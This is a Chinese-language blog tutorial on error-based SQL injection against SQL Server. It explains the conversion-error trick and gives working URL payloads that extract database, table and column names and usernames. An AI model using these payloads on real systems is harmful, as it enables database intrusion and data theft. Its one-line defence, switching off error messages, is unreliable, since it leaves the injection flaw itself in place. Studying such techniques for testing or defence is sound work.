SQL Server 报错注入(一)

admin 2024年11月3日00:19:20SQL Server 报错注入(一)已关闭评论10 views字数 1670阅读5分34秒阅读模式

一、原理介绍

报错注入,顾名思义首先这里是有报错信息才可以,其次我们需要人为的制造一些错误,比如使用convert()函数进行类型转换时,如果类型转换失败就会报错,然后这里把我们要执行的SQL语句与convert()函数组合起来,例如convert(int,@@version),在报错信息中就有我们需要的信息。

二、函数介绍

convert()函数介绍:
定义: convert() 函数是把日期转换为新数据类型的通用函数。
用法: convert(int,db_name()),含义是将第二个参数的值转换成第一个参数的int类型。利用MSSQL在转换类型的时候就出错,来爆数据库信息。

quotename()函数介绍:
定义: quotename() 函数默认在要处理的参数左右加上两个中括号,起到分隔符的作用,避免出现sql关键字异常。
用法: quotename(name),给查询出的多个表名、列名加入中括号,或者其他符号为分隔符,进行分割,可使SQL注入结果更清晰。

for xml path(’’)语句介绍:
定义: 提供查询返回的结果为xml格式,此时返回的相当于一个字符串。
用法: 将查询到的数据,通过xml进行显示,path指定xml元素结点(行节点),该语句可以将查询到的所有数据通过XML进行显示。
SQL Server 报错注入(一)
stuff()函数介绍:
定义: stuff()函数将表中列的内容横向输出。
用法: stuff(param1, startIndex, length, param2),将param1中自startIndex(SQL中都是从1开始,而非0)起,删除length个字符,然后用param2替换删掉的字符。

三、常用数据表介绍

​ 在master数据库中包含了很多系统表,其中sys.databases这张表中储存了SQLServer中所有的数据库的库名;sys.objects表中储存了SQLServer中所有的数据库的表名;sys.columns表中储存了SQLServer中所有的数据表的列名。
SQL Server 报错注入(一)

四、注入方式

1.爆数据库

id=1' and 1=convert(int,(select db_name(0)))--+
id=1' and 1=convert(int,(select db_name(1)))--+   //查询第二个数据库,以此类推
  • 1
  • 2

SQL Server 报错注入(一)
将所有的数据库连接起来进行显示。

id=1' and 1=convert(int,stuff((select quotename(name) from sys.databases for xml path('')),1,0,''))--+
  • 1

SQL Server 报错注入(一)
2.爆数据表

id=1' and 1=convert(int,(select top 1 name from test.sys.objects where type='U'))--+
id=1' and 1=convert(int,stuff((select  quotename(name) from test.sys.objects where type='U' for xml path('')),1,0,''))--+
  • 1
  • 2

SQL Server 报错注入(一)
将所有表连接起来进行显示。
SQL Server 报错注入(一)
3.爆字段(此处方法同上)

id=1' and 1=convert(int,(select top 1 name from test.sys.columns where object_id=object_id('users')))--+
id=1' and 1=convert(int,stuff((select quotename(name) from test.sys.columns where object_id=object_id('users') for xml path('')),1,0,''))--+
  • 1
  • 2

SQL Server 报错注入(一)
SQL Server 报错注入(一)
4.爆数据

id=1' and 1=convert(int,(select top 1 username from users))--+
id=1' and 1=convert(int,stuff((select quotename(username) from users for xml path('')),1,0,''))--+
  • 1
  • 2

SQL Server 报错注入(一)
SQL Server 报错注入(一)

五、防御方式

关闭错误提示即可

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月3日00:19:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   SQL Server 报错注入(一)https://cn-sec.com/archives/3348122.html